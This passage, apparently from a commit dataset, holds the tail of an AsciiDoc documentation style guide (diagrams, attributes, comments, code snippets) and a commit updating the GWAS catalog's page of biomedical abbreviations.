[label=\"relationship\"]\n ----\n----\n\nWhich is rendered as:\n\n[\"dot\", \"community-docs-graphdb-rels.svg\"]\n----\n\"Start node\" -> \"End node\" [label=\"relationship\"]\n----\n\nHere's an example using some predefined variables available in the build:\n\n[source]\n----\n [\"dot\", \"community-docs-graphdb-rels-overview.svg\", \"meta\"]\n ----\n \"A Relationship\" [fillcolor=\"NODEHIGHLIGHT\"]\n \"Start node\" [fillcolor=\"NODE2HIGHLIGHT\"]\n \"A Relationship\" -> \"Start node\" [label=\"has a\"]\n \"A Relationship\" -> \"End node\" [label=\"has a\"]\n \"A Relationship\" -> \"Relationship type\" [label=\"has a\"]\n \"Name\" [TEXTNODE]\n \"Relationship type\" -> \"Name\" [label=\"uniquely identified by\" color=\"EDGEHIGHLIGHT\" fontcolor=\"EDGEHIGHLIGHT\"]\n ----\n----\n\nWhich is rendered as:\n\n[\"dot\", \"community-docs-graphdb-rels-overview.svg\", \"meta\"]\n----\n\"A Relationship\" [fillcolor=\"NODEHIGHLIGHT\"]\n\"Start node\" [fillcolor=\"NODE2HIGHLIGHT\"]\n\"A Relationship\" -> \"Start node\" [label=\"has a\"]\n\"A Relationship\" -> \"End node\" [label=\"has a\"]\n\"A Relationship\" -> \"Relationship type\" [label=\"has a\"]\n\"Name\" [TEXTNODE]\n\"Relationship type\" -> \"Name\" [label=\"uniquely identified by\" color=\"EDGEHIGHLIGHT\" fontcolor=\"EDGEHIGHLIGHT\"]\n----\n\nThe optional second argument given to the dot filter defines the style to use:\n\n* when not defined: Default styling for nodespace examples.\n* +neoviz+: Nodespace view generated by Neoviz.\n* +meta+: Graphs that don't resemble db contents, but rather concepts.\n\nCAUTION: Keywords of the DOT language have to be surrounded by double quotes when used for other purposes.\n The keywords include _node, edge, graph, digraph, subgraph,_ and _strict_.\n\n\n== Attributes ==\n\nCommon attributes you can use in documents:\n\n* \\{opennms-version} - rendered as \"{opennms-version}\"\n* \\{opennms-git-tag} - rendered as \"{opennms-git-tag}\"\n\nThese can substitute part of URLs that point to for example APIdocs or source code.\nNote that opennms-git-tag also handles the case of snapshot\/master.\n\nSample Asciidoc attributes which can be used:\n\n* \\{docdir} - root directory of the documents\n* \\{nbsp} - non-breaking space\n\n== Comments ==\n\nThere's a separate build including comments.\nThe 
comments show up with a yellow background.\nThis build doesn't run by default, but after a normal build, you can use `make annotated` to build it.\nYou can also use the resulting page to search for content, as the full manual is on a single page.\n\nHere's how to write a comment:\n\n[source]\n----\n\/\/ this is a comment\n----\n\nThe comments are not visible in the normal build.\nComment blocks won't be included in the output of any build at all.\nHere's a comment block:\n\n[source]\n----\n\/\/\/\/\nNote that includes in here will still be processed, but not make it into the output.\nThat is, missing includes here will still break the build!\n\/\/\/\/\n----\n\n== Code Snippets ==\n\n=== Explicitly defined in the document ===\n\nWARNING: Use this kind of code snippets as little as possible.\n They are well known to get out of sync with reality after a while.\n\nThis is how to do it:\n\n[source,xml]\n----\n<service name=\"DNS\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"2\" \/>\n <parameter key=\"timeout\" value=\"5000\" \/>\n <parameter key=\"port\" value=\"53\" \/>\n <parameter key=\"lookup\" value=\"localhost\" \/>\n <parameter key=\"fatal-response-codes\" value=\"2,3,5\" \/><!-- ServFail, NXDomain, Refused -->\n <parameter key=\"rrd-repository\" value=\"\/opt\/opennms\/share\/rrd\/response\" \/>\n <parameter key=\"rrd-base-name\" value=\"dns\" \/>\n <parameter key=\"ds-name\" value=\"dns\" \/>\n<\/service>\n----\n\nIf there's no suitable syntax highlighter, just omit the language: +[source]+.\n\nCurrently the following syntax highlighters are enabled:\n\n* Bash\n* Groovy\n* Java\n* JavaScript\n* Python\n* XML\n\nFor other highlighters we could add see https:\/\/code.google.com\/p\/google-code-prettify\/.\n\n=== Fetched from source code ===\n\nCode can be automatically fetched from source files.\nYou need to define:\n\n* component: the +artifactId+ of the Maven coordinates,\n* source: path to the file inside the jar it's deployed to,\n* classifier: +sources+ or +test-sources+ or any other classifier pointing to the artifact,\n* tag: tag name to search the file for,\n* the language of the code, if a corresponding syntax highlighter is available.\n\nNote that the artifact has to be included as a Maven dependency of the Manual project so that the files can be found.\n\nThe file will be searched for lines including +START SNIPPET: {tag}+ and +END SNIPPET: {tag}+, the lines between those will go into the output.\nBe aware of that the tag \"abc\" will match \"abcd\" as well.\nIt's a simple on\/off switch, meaning that multiple occurrences will be assembled into a single code snippet in the output.\nThis behavior can be user to hide away assertions from code examples sourced from tests.\n\nThis is how to define a code snippet inclusion:\n\n[source]\n----\n [snippet,java]\n ----\n component=opennms-examples\n source=org\/opennms\/examples\/JmxDocTest.java\n classifier=test-sources\n tag=getStartTime\n ----\n----\n\nThis is how it renders:\n\n[snippet,java]\n----\ncomponent=neo4j-examples\nsource=org\/neo4j\/examples\/JmxDocTest.java\nclassifier=test-sources\ntag=getStartTime\n----\n\n\n=== Query Results ===\n\nThere's a special filter for Cypher query results.\nThis is how to tag a query result:\n\n[source]\n----\n .Result\n [queryresult]\n ----\n +----------------------------------+\n | friend_of_friend.name | count(*) |\n +----------------------------------+\n | Ian | 2 |\n | Derrick | 1 |\n | Jill | 1 |\n +----------------------------------+\n 
3 rows, 12 ms\n ----\n----\n\nThis is how it renders:\n\n.Result\n[queryresult]\n----\n+----------------------------------+\n| friend_of_friend.name | count(*) |\n+----------------------------------+\n| Ian | 2 |\n| Derrick | 1 |\n| Jill | 1 |\n+----------------------------------+\n3 rows, 12 ms\n----\n\n\n== A sample Java based documentation test ==\n\nFor Java, there are a couple of premade utilities that keep code and documentation together in\nJavadocs and code snippets that generate Asciidoc for the rest of the toolchain.\n\nTo illustrate this, look at the following documentation that generates the Asciidoc file +hello-world-title.asciidoc+ with a content of:\n\n[source]\n------------------------------\ninclude::{importdir}\/neo4j-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n------------------------------\n\nthis file is included in this documentation via\n\n[source]\n----\n :leveloffset: 3\n include::{importdir}\/neo4j-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n----\n\nwhich renders the following chapter:\n\n:leveloffset: 3\n\ninclude::{importdir}\/neo4j-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n\n:leveloffset: 2\n\n== Images\n\n.pris-overview.graphml\nimage::images\/pris-overview.png[pris-overview.graphml]\n\n.example.odp\nimage::images\/example.png[example.odp]\n\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d2df75ab04402be6368272068119293c8a4e4741","subject":"Update abbreviations-content.adoc","message":"Update abbreviations-content.adoc","repos":"EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci","old_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_contents":"= Abbreviations\n\n== Full Description of Abbreviations used in the Catalog\n\n<<Special Characters>>, <<A>>, <<B>>, <<C>>, <<D>>, <<E>>, <<F>>, <<G>>, <<H>>, <<I>>, <<K>>, <<L>>, <<M>>, <<N>>, <<O>>, <<P>>, <<Q>>, <<R>>, <<S>>, <<T>>, <<U>>, <<V>>, <<W>>, <<XYZ>>\n\n=== Special Characters\n\n?: A risk allele not reported\n\n\n5-HIAA: 5-hydroxyindoleacetic acid\n\n=== A\n\nA2: Biantennary nogalactosylated glycans\n\n\nAA: African ancestry\n\n\nAAM-BR: Age at menarche and buckling ratio\n\n\nAAM-CT: Age at menarche and cortical thickness\n\n\nAAM-W: Age at menarche and periosteal diameter\n\n\nAAT: alanine aminotransferase\n\n\nAAC: abdominal aortic calcium\n\n\nA action: Aggregatibacter actinomycetemcomitans\n\n\nAb: Amyloid-beta\n\n\nABI: ankle brachial index\n\n\nACA: anti-centromere antibodies\n\n\nACE: Angiotensin-converting enzyme\n\n\nACPA: antibodies to citrullinated peptide antigens\n\n\nACVn: normalised agkistrodon contortrix venom ratio\n\n\nAD: Alzheimer's Disease\n\n\nADM: Adrenomedullin\n\n\nAF: atrial fibrillation\n\n\nAFBV: Frontal Brain volume\n\n\nAFP: alpha-
fetoprotein\n\n\nAFVB: multivariable-adjusted frontal brain volume\n\n\nAIMS: Abnormal Involuntary Movements Scale\n\n\nAIRg: Acute insulin response\n\n\nAla: Alanine\n\n\nALB: albumin\n\n\nALB\/GLB: serum albumin:globulin ratio\n\n\nALL: all ancestries\n\n\nALL-dr: combined tests of verbal delayed recall\n\n\nALLV: adjusted log lateral ventricular volume\n\n\nALP: alkaline phosphatase\n\n\nAlpha-TOH: alpha-tocopherol\n\n\nALS: amyotrophic lateral sclerosis\n\n\nALT: alanine aminotransferase\n\n\nALTHBV: multivariable-adjusted temporal horn volume\n\n\nAlkPhos: Alkaline phosphatase\n\n\nAMD: Age-related macular degeneration\n\n\nANC: Absolute neutrophil count\n\n\nANP6: N-terminal pro-atrial natriuretic peptide\n\n\nAngCAD: angiographic coronary disease\n\n\nAOI: age of smoking initiation\n\n\napoA-1: apolipoprotein A-1\n\n\naPTT: activated partial thromboplastin time\n\n\nARC: AR-C124910XX\n\n\nASD: Ostium secundum atrial septal defect\n\n\nAST: aspartate aminotransferase\n\n\nAt: antithrombin\n\n\nATA: anti-topoisomerase antibodies\n\n\nATBV: temporal brain volume\n\n\nATCBV: total cerebral brain volume\n\n\nATVB: multivariable-adjusted temporal brain volume\n\n\nAUC: area under the curve\n\n=== B\n\nBABF: baseline brachial artery flow velocity\n\n\nBARS: Barnes Akathisia Scale\n\n\nBB: beta blockers\n\n\nBD: bipolar disorder\n\n\nBD-RT: bone density estimated by T score at distal radius\n\n\nBD-TT: bone density estimated by T score at midshaft tibia\n\n\nBMD: bone mineral density\n\n\nBMI: body mass index\n\n\nBMR: basal metabolic rate\n\n\nBMR RQ: respiratory quotient during basal metabolic rate measurement\n\n\nBPV: brain parenchymal volume\n\n\nBRCA1\/2: breast cancer 1 gene and breast cancer 2 gene\n\n\nBUA: Broadband ultrasound attenuation\n\n\nBUN: blood urea nitrogen\n\n=== C\n\nC: cholesterol\n\n\nC3: Propionylcarnitine\n\n\nC4: Butyrylcarnitine\n\n\nC9: Nonaylcarnitine\n\n\nC10: Decanoylcarnitine\n\n\nC10:2: Decadienylcarnitine\n\n\nC12: Dodecanoylcarnitine\n\n\nC14:1-OH: Hydroxytetradecenoylcarnitine\n\n\nCA19-9: cancer antigen 19-9\n\n\nCAC: coronary artery calcification\n\n\nCAL: coronary artery lesions\n\n\nCB-PWV: carotid brachial pulse wave velocity\n\n\nCBT: Cortical thickness of the tibia\n\n\nCC16: Clara cell secretory protein\n\n\nCCA: common carotid artery\n\n\nCCA IMT: common carotid artery intimal medial thickness\n\n\nCCB: calcium channel blockers\n\n\nCCT: central corneal thickness\n\n\nCD40L: Ligand, serum & plasma\n\n\ncDAS28: Disease Activity Score\n\n\nCDC: Complicated disease course\n\n\nCE: cholesterol ester\n\n\nCEA: carcinoembryonic antigen\n\n\nCer: ceramide\n\n\nCERAD-dr: Consortium to Establish a Registry for Alzheimer\u2019s Disease delayed recall\n\n\nCEU: CEPH (Centre d'Etude du Polymorphisme Humain) from Utah\n\n\nCF-PWVLTA: carotid-femoral pulse wave velocity, long-term average\n\n\nCGI: Clinical Global Impressions-Severity\n\n\nCHS1: 1st principal component on transformed hue and saturation values\n\n\nCK: creatine kinase\n\n\nCKD: chronic kidney disease\n\n\ncHAQ: health assessment questionnaire score\n\n\ncHL: Classical Hodgkin lymphoma\n\n\nCIGSTAT: former\/current smokers\n\n\ncIMT: carotid intima media thickness\n\n\nCL: cleft lip without cleft palate\n\n\nCL\/P: cleft lip with or without cleft palate\n\n\nCOWA: total number of correct words across three letters\n\n\nCP: cleft palate\n\n\nCPd: Chronic periodontitis\n\n\nCPD: cigarettes per day\n\n\nCPDBI: 10 or more cigarettes per day\n\n\nCRP: C-reactive protein\n\n\nCRP average 2,6,7: 
C-reactive protein (CRP) averaged from 3 examinations (over about 20 years)\n\n\nCRP2: C-reactive protein, offspring exam 2\n\n\nCRP average 2,6,7: C-reactive protein average exam 2,6,7\n\n\nCRP6: C-reactive protein exam 6\n\n\nCS: cardioembolic stroke\n\n\ncSJC: Swollen joint count\n\n\ncTJC: Tender joint count\n\n\nCVD: cardiovascular disease\n\n\nCVLT-dr: California Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== D\n\nD: particle diameter\n\n\nDBP: diastolic blood pressure\n\n\nDBPLTA: diastolic blood pressure, long-term average\n\n\nD.f.: Dermatophagoides farinae\n\n\nDG: Desialylated 2AB-labelled human plasma N-glycans groups\n\n\nDGI+FUSION+WTCCC: combined results from the DGI, FUSION, WTCCC analyses\n\n\nDHEA-S: dehydroisoandrosterone sulfate\n\n\nDI: Disposition index\n\n\nDM: diabetes mellitus\n\n\nD.p.: Dermatophagoides pteronyssinus\n\n\nDWRT-dr: Delayed Word Recall Test (belongs to WL-dr category)\n\n\nDXA: dual energy X-ray absorptiometry\n\n=== E\n\nEA: European Ancestry\n\n\nEBV: Epstein-Barr virus\n\n\nEDS: excessive daytime sleepiness\n\n\nEEG: electroencephalography\n\n\nEER: estimated energy requirement\n\n\neGFR: glomerular filtration rate\n\n\neGFRcrea: estimated glomerular filtration rate based on serum creatinine\n\n\neGFRcys: serum cystatin C\n\n\nEIM: Extraintestinal manifestations\n\n\nEM: Elated mania\n\n\nER +ve: Estrogen receptor positive\n\n\nER -ve: Estrogen receptor negative\n\n\nET-1: Endothelin-1\n\n\nET: endocrine treatment\n\n\nESCC: esophageal squamous cell carcinoma\n\n\nESRD: end-stage renal disease\n\n\nESS: Epworth Sleepiness Scale\n\n\nEst-C: esterified cholesterol\n\n\nEVNV: ever smokers, never smokers\n\n=== F\n\nF2: Factor 2 (visual memory and organization)\n\n\nF3: Factor 3 (measure of attention and executive function - Trails A and B)\n\n\nFA: female athletes\n\n\nFC: free cholesterol\n\n\nFEF: forced expiratory flow\n\n\nFEV1: forced expiratory volume in 1 second\n\n\nfev1slope: longitudinal slope of forced expiratory volume in one second\n\n\nFG: fibrinogen\n\n\nFI: fasting insulin\n\n\nFLE: female long endurance athletes\n\n\nFN: femoral neck\n\n\nFNBMDm: femoral bone mineral density in males\n\n\nFPG: fasting plasma glucose\n\n\nfPS: free Protein S\n\n\nFree T3: fasting serum free triiodothyronine\n\n\nFS: female-only stroke\n\n\nFSD: female sexual dysfunction\n\n\nFSG: fasting serum glucose\n\n\nFSH: follicle-stimulating hormone\n\n\nFSIGT: frequently sampled intravenous glucose tolerance test\n\n\nFt3: free thyroxine 3\n\n\nFt4: free thyroxine\n\n\nFTD: frontotemporal dementia\n\n\nFUC-A: Antennary fucosylated glycans\n\n\nFUC-C: Core fucosylated glycans\n\n\nfuncPS: functional Protein S\n\n\nFVC: forced vital capacity\n\n\nFVII: Coagulation factors VII\n\n\nFWLTA: forward wave amplitude, long-term average\n\n=== G\n\nG3D: grade 3 diarrhea\n\n\nGBA: glucocerebrosidase\n\n\nGGT: glutamyltranspeptidase\n\n\nGlc: Glucose\n\n\nGln: Glutamine\n\n\nGLU: glucose\n\n\nGluCer: glucosylceramide\n\n\nGOT (AST): Glutamic oxaloacetic transaminase, Aspartate aminotransferase\n\n\nGP: Glycan peak\n\n\nGPT (ALT): glutamate pyruvate transaminase, alanine aminotransferase\n\n\nGP130: glycoprotein 130\n\n\nGSE: general side effect burden\n\n=== H\n\nHAM-A: Hamilton Anxiety Scale\n\n\nHbA1C: hemoglobin A1c\n\n\nHbF: fetal hemoglobin\n\n\nHcy: homocysteine\n\n\nHDL-C: Total cholesterol in HDL\n\n\nHER2: human epidermal growth factor receptor 2\n\n\nHgb: Hemoglobin\n\n\nHis: Histidine\n\n\nHOMA-IR: homeostasis model assessment of 
insulin resistance\n\n\nHIV: human immunodeficiency virus\n\n\nHDL: high density lipoprotein\n\n\nHOMA-B: homeostasis model assessment of beta-cell function\n\n\nHR: hormone receptor\n\n\nHRmax: maximum heart rate during treadmill fitness test\n\n\nHt: hematocrit\n\n\nHU: Hounsfield units\n\n\nHVA: homovanillic acid\n\n\nHVLT-dr: Hopkins Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== I\n\nICAIMT: internal carotid artery internal and common carotid intimal medial thickness\n\n\nICAM: Intercellular adhesion molecule\n\n\nIED: intra-extradimensional set shifting\n\n\nIGF1: insulin-like growth factor I precursor\n\n\nIGFBP-1: fasting serum insulin-like growth factor binding protein-1\n\n\nIGFBP-3: fasting serum insulin-like growth factor binding protein-3\n\n\nIL6: Interleukin-6 precursor\n\n\nIL8: Interleukin-8 precursor\n\n\nIL10: Interleukin-10 precursor\n\n\nIL12: interleukin-12 precursor\n\n\nIL18: Interleukin-18 precursor\n\n\nIL1B: Interleukin-1, beta\n\n\nIL1RA: interleukin-1 receptor antagonist protein precursor\n\n\nIM: irritable mania\n\n\nIMT: Carotid intimal medial thickness\n\n\nINS: insulin\n\n\nint: interaction\n\n\nIR: insulin resistance\n\n\nIS: all ischemic stroke\n\n\nISI_0-120: 0-120 min insulin sensitivity index\n\n=== K\n\nKD: Kawasaki disease\n\n=== L\n\nLA: linoleic acid\n\n\nLAA: large artery atherosclerosis\n\n\nLAD: left atrial diameter\n\n\nLC: lung cancer\n\n\nLDL: low density lipoprotein\n\n\nLDL-C: Total cholesterol in LDL\n\n\nLF\/HF: ratio of low frequency to high frequency power\n\n\nL-LDL-FC: The free cholesterol content of large LDL\n\n\nL-HDL-L: Total lipids in large HDL\n\n\nLp(a): lipoprotein (a)\n\n\nLS: lumbar spine\n\n\nLTG: lamotrigine-induced hypersensitivity\n\n\nLTL: leukocyte telomere length\n\n\nLVEF: Left ventricular ejection fraction\n\n\nLVD: large-vessel disease\n\n\nLVDD: left ventricular diastolic diameter\n\n\nLVFS: left ventricular fractional shortening\n\n\nLVM: left ventricular mass\n\n\nLVMI: left ventricular mass index\n\n\nLVSD: left ventricular systolic dimension\n\n\nLYM: Lymphoma subtypes\n\n=== M\n\nM: from clamp\n\n\nMA: male athletes\n\n\nMAP: mean arterial pressure\n\n\nMAPLTA: mean arterial pressure, long-term average\n\n\nmaxL*: maximum L* (reflectance)\n\n\nMC: mother's criticism\n\n\nMCH: mean corpuscular hemoglobin\n\n\nMCHC: mean corpuscular hemoglobin concentration\n\n\nMCI: mild cognitive impairment\n\n\nMCS: Mental Component Summary\n\n\nMCV: mean corpuscular volume\n\n\nMCP1: monocyte chemoattractant protein-1\n\n\nMDC: Mild disease course\n\n\nmeanFVC: mean forced vital capacity from 2 exams\n\n\nmeanratio: mean FEV1\/FVC from 2 exams\n\n\nMETH: Methamphetamine\n\n\nMHBMA: 2-(N-acetyl-L-cystein-S-yl)-1-hydroxybut-3-ene and 1-(N-acetyl-L-cystein-S-yl)-1-hydroxybut-3-ene\n\n\nM-HDL-L: Total lipids in medium HDL\n\n\nMHPG: 3-methoxy-4-hydroxyphenylglycol\n\n\nMI: myocardial infarction\n\n\nMIP-1b: macrophage inflammatory protein beta\n\n\nM-LDL-C: Total cholesterol in medium LDL\n\n\nM-LDL-PL: Phospholipids in medium LDL\n\n\nMLE: male long endurance athletes\n\n\nMobCH: double-bond protons of mobile lipids\n\n\nMMnb: mismatch negativity (300-710 ms)\n\n\nMMR: measles, mumps and rubella vaccination\n\n\nMMSE: Mini-mental state examination\n\n\nMSE: middle and short endurance athletes\n\n\nMSSS: Multiple Sclerosis Severity Scale\n\n\nM-VLDL-PL: Phospholipids in medium VLDL\n\n\nMW: mother's warmth\n\n=== N\n\nNA: not applicable\n\n\nNAP: non-albumin protein\n\n\nNam: Boston Naming 
Test\n\n\nNCI: neurocognitive impairment\n\n\nNeckZ1: Neck section modulus\n\n\nNeckZ1rf: neck section modulus in females\n\n\nNeckW1rf: neck width in females\n\n\nNeckZ1rm: neck section modulus in males\n\n\nNEFA: fasting serum nonesterified fatty acids\n\n\nNFT: neurofibrillary tangles\n\n\nNHL: Non-Hodgkin's Lymphoma\n\n\nNL: neck length\n\n\nNPC: nasopharyngeal carcinoma\n\n\nNPG: normal-pressure glaucoma\n\n\nNR: not reported\n\n\nNS: none significant\n\n\nNSA: neck shaft angle\n\n\nNSAm: neck-shaft angle in males\n\n\nNSCL\/P: nonsyndromic cleft lip with or without cleft palate\n\n\nNW: neck width\n\n\nNvrb: Non Verbal\n\n=== O\n\nOCPD: Childhood Obsessive-Compulsive Personality Disorder\n\n\nOR: odds ratio\n\n=== P\n\nP: particle concentration\n\n\nP3MRSBP: post exercise 3 minute recovery systolic blood pressure\n\n\nPAD: peripheral artery disease\n\n\nPAI-1: plasminogen activator inhibitor\n\n\nPAL: paired associates learning\n\n\nPAR-dr: paragraph delayed recall\n\n\nPC: Protein C\n\n\nPC1: principal component axis 1, CANTAB measures\n\n\nPC2: principal component analysis 2\n\n\nPC3: principal component analysis 3\n\n\nPC aa C36:3: Phosphatidylcholine diacyl C36:3\n\n\nPC aa C36:4: Phosphatidylcholine diacyl C34:4\n\n\nPCS: Physical Component Summary\n\n\nPCV: packed cell volume\n\n\nPD: Parkinson\u2019s disease\n\n\nP gingi: Porphyromonas gingivalis\n\n\nPhe: Phenylalanine\n\n\nPHT: phenytoin-induced hypersensitivity\n\n\nPKYRS: pack-years\n\n\nPL: phospholipid\n\n\nPLT: platelets\n\n\npltadp: platelet aggregation (ADP-induced)\n\n\npltcoll: platelet aggregation (collagen-induced)\n\n\nPP: pulse pressure\n\n\nppfef: percent predicted FEF25-75 for latest exam\n\n\nppfefrat: percent predicted FEF25-75\/FVC for latest exam\n\n\nppfvc: percent predicted FVC for latest exam\n\n\nppfev1: percent predicted FEV1 for latest exam\n\n\nppFEV1\/FEC\/FEE: percent predicted FEV1\/FVC\/FEF\n\n\nppratio: percent predicted FEV1\/FVC for latest exam\n\n\nPRM: pattern recognition memory\n\n\nPROP: propylthiouracil solution\n\n\nPS: protein S\n\n\nPSC: primary sclerosing cholangitis\n\n\nPT: prothrombin time\n\n\nPUFA: polyunsaturated fatty acids\n\n\npvRSA\/HF: peak-valley respiratory sinus arrhythmia or high frequency power\n\n=== Q\n\nQC: quality control\n\n\nQUICKI: fasting serum quantitative insulin sensitivity check index\n\n=== R\n\nRA: Rheumatoid arthritis\n\n\nRANTES: fasting serum regulated upon activation, normal T-cell expressed and secreted\n\n\nRAVLT-dr: Rey\u2019s Auditory Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n\nRBC: red blood cell\n\n\nRBCC: red blood cell count\n\n\nRDW: red cell distribution width\n\n\nRMSSD: root mean square of the successive differences of inter beat intervals\n\n\nRQmax: maximum respiratory quotient during treadmill fitness test\n\n\nRVP: rapid visual processing\n\n\nRW: reflected wave amplitude\n\n\nRWLTA: reflected wave amplitude, long-term average\n\n=== S\n\nS2EHR: Stage 2 exercise heart rate\n\n\nS2ESBP: stage 2 exercise systolic blood pressure\n\n\nSBM: subset-based meta-analysis approach\n\n\nSDNN: standard deviation of the normal-to-normal inter beat intervals\n\n\nserum TG: serum total triglyceride content\n\n\nSAS: Simpson-Angus Scale\n\n\nSBP: systolic blood pressure\n\n\nSBPLTA: systolic blood pressure, long-term average\n\n\nsCR: serum creatinine\n\n\nSCZ and BD: Schizophrenia and Bipolar disorder\n\n\ns.d.: standard deviation\n\n\nSE: sleep efficiency\n\n\nSG: Glucose effectiveness\n\n\nShaftW1: Shaft width 
combined\n\n\nShaftW1f: shaft width in females\n\n\nShaftZ1rf: shaft section modulus in females\n\n\nShaftZ1R: shaft section modulus\n\n\nSHBG: sex hormone binding globulin\n\n\nSI: SI from FSIGT\n\n\nsICAM-1: fasting serum soluble intercellular adhesion molecule-1\n\n\nsIL-6R: soluble interleukin\n\n\nSim: Similarities\n\n\nSleep RQ: respiratory quotient during sleep\n\n\nSLE: systemic lupus erythematosus\n\n\nSM-1: butyrylcarnitine \/ propionylcarnitine\n\n\nSM-2: N-acetylornithine\n\n\nSM-3: 1-arachidonoylglycero phosphoethanolamine \/ 1-linoleoylglycerophospho-ethanolamine\n\n\nSM-4: bilirubin (E,E) \/ oleoylcarnitine\n\n\nSM-5: hexanoylcarnitine \/ oleate (18:1n9)\n\n\nSM-6: myristate (14:0) \/ myristoleate (14:1n5)\n\n\nSM-7: 1-methylxanthine \/ 4-acetamidobutanoate\n\n\nSM-8: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\n\nSM-9: 10-nonadecenoate (19:1n9) \/ 10-undecenoate (11:1n1)\n\n\nSM-10: eicosenoate (20:1n9 or 11) \/ tetradecanedioate\n\n\nSM-11: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\nSM-12: ADSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-13: androsterone sulfate \/ epiandrosterone sulfate\n\n\nSM-14: ADpSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-15: 1-eicosatrienoylglycero-phosphocholine \/ 1-linoleoylglycero phosphocholine\n\n\nSM-16: docosahexaenoate (DHA; 22:6n3) \/ eicosapentaenoate (EPA; 20:5n3)\n\n\nSM-17: 3-(4-hydroxyphenyl)lactate \/ isovalerylcarnitine\n\n\nSMKAGE: age of initiation (years)\n\n\nSMKDU: duration (years)\n\n\nSM: sphingomyelin\n\n\nSpc: spectrum\n\n\nSP-D: surfactant protein D\n\n\nSPEED: processing speed\n\n\nSRM: spatial recognition memory\n\n\nSSP: spatial span\n\n\nSSRI: selective serotonin reuptake inhibitor\n\n\nsTfR: Soluble Transferrin Receptor\n\n\nsTie-2: soluble receptor Tie-2\n\n\nStr: strict\n\n\nSVD: small-vessel disease\n\n\nSWM: spatial working memory\n\n=== T\n\nTA: Tetra-antennary glycans\n\n\nTAT: Total adipose tissue area\n\n\nTBLH-BMD: total-body less head bone mineral density\n\n\nTB-LM: total-body lean mass\n\n\nTC: total cholesterol\n\n\nTEE: 24-h total energy expenditure\n\n\ntFPG: 28 year time averaged fasting plasma glucose (FPG)\n\n\nTG: triglycerides\n\n\nTGF-b1: transforming growth factor\n\n\nTG\/HDLC: fasting serum triglycerides\/high density lipoprotein cholesterol\n\n\nTIDN: Type 1 diabetes diabetic nephropathy\n\n\nTotal PS: Total Protein S\n\n\nTotal T3: fasting serum triiodothyronine\n\n\nTotal T4: fasting serum thyroxine\n\n\nTP: total protein\n\n\ntPA: tissue plasminogen activator\n\n\nTNFA: tumor necrosis factor alpha\n\n\nTRBMD: Trochanter bone mineral density\n\n\nTRBMDm: Trochanter bone mineral density males\n\n\nTSH: thyroid stimulating hormone\n\n\nTyr: Tyrosine\n\n=== U\n\nUAE: urinary albumin excretion\n\n=== V\n\nVal: Valine\n\n\nvBMD: volumetric bone mineral density\n\n\nVitD250H: Vitamin D plasma 25(OH)-D\n\n\nVitkPhylloq: Vitamin K plasma phylloquinone\n\n\nVLDL: very-low-density lipoprotein\n\n\nVLDL-D: Mean diameter for VLDL particles\n\n\nVO2max: maximum oxygen consumption during treadmill fitness test\n\n\nVOS: velocity of sound\n\n\nVPWL-dr: delayed recall for visually presented word list\n\n\nVrb: verbal\n\n\nVRM: verbal recall\n\n\nvWF: Willebrand factor\n\n=== W\n\nWBC: white blood cell\n\n\nWC: waist circumference\n\n\nWCadjBMI: WC adjustment for BMI\n\n\nWF: weight fluctuation\n\n\nWGHS: Women's Genome Health Study\n\n\nWHR: waist hip ratio\n\n\nWHRadjBMI: WHR adjustment for BMI\n\n\nWIT: word interference test\n\n\nWL-dr: word list delayed recall\n\n\nWRAT: Wide-Range Achievement Test\n\n=== 
XYZ\n\nXL-HDL-CE: The cholesterol ester content of extra large HD\n\n\nXL-HDL-TG: Triglycerides in very large HDL\n\n\nXXL-VLDL-P: extremely large VLDL particles\n\n\nYKL-40: (Chitinase 3-like 1) protein levels\n","old_contents":"= Abbreviations\n\n== Full Description of Abbreviations used in the Catalog\n\n<<Special Characters>>, <<A>>, <<B>>, <<C>>, <<D>>, <<E>>, <<F>>, <<G>>, <<H>>, <<I>>, <<K>>, <<L>>, <<M>>, <<N>> ,<<O>>, <<P>>, <<Q>>, <<R>>, <<S>>, <<T>>, <<U>>, <<V>>, <<W>>, <<XYZ>>\n\n=== Special Characters\n\n?: A risk allele not reported\n\n\n5-HIAA: 5-hydroxyindoleacetic acid\n\n=== A\n\nAA: African ancestry\n\n\nAAM-BR: Age at menarche and buckling ratio\n\n\nAAM-CT: Age at menarche and cortical thickness\n\n\nAAM-W: Age at menarche and periosteal diameter\n\n\nAAT: alanine aminotransferase\n\n\nAAC: abdominal aortic calcium\n\n\nA action: Aggregatibacter actinomycetemcomitans\n\n\nAb: Amyloid-beta\n\n\nABI: ankle brachial index\n\n\nACA: anti-centromere antibodies\n\n\nACE: Angiotensin-converting enzyme\n\n\nACPA: antibodies to citrullinated peptide antigens\n\n\nACVn: normalised agkistrodon contortrix venom ratio\n\n\nAD: Alzheimer's Disease\n\n\nADM: Adrenomedullin\n\n\nAF: atrial fibrillation\n\n\nAFBV: Frontal Brain volume\n\n\nAFP: ? fetoprotein\n\n\nAFVB: multivariable-adjusted frontal brain volume\n\n\nAIMS: Abnormal Involuntary Movements Scale\n\n\nAIRg: Acute insulin response\n\n\nAla: Alaine\n\n\nALB: albumin\n\n\nALB\/GLB: serum albumin:globulin ratio\n\n\nALL: all ancestries\n\n\nALL-dr: combined tests of verbal delayed recall\n\n\nALLV: adjusted log lateral ventricular volume\n\n\nALP: alkaline phosphatase\n\n\nAlpha-TOH: alpha-tocopherol\n\n\nALS: amyotrophic lateral sclerosis\n\n\nALT: alanine aminotransferase\n\n\nALTHBV: multivariable-adjusted temporal horn 